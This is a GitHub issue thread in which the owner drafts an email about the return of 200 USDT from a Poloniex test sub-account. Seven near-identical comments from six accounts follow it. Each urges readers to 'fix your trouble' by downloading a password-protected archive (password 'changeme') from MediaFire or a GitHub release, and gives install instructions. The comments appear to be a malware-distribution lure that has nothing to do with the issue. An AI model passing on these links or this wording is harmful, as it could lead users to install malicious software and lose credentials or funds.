### ISSUE TITLE
poloniex子账户申请测试资金-30天归还-200u

### ISSUE THREAD

**Issue by mrsunnyy** [Golden-Siv/Sunny#4]

**Comment by mrsunnyy** [comment]
Draft:

Hi Craig,

This is a follow-up regarding the agreed upon return of 200 USDT from the Poloniex test sub-account within 30 days. Could you please provide an estimated completion date for transfer the fund back to main account?

HK finance team will be responsible for arranging the funds once the transfer is complete.

Thank you for your time and assistance.

Best regards,
Sunny

**Comment by mrsunnyy** [comment]
Deadline update: 31 Oct 2024

![Image](https://github.com/user-attachments/assets/304266b8-f54e-4668-a56f-ab408f997427)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
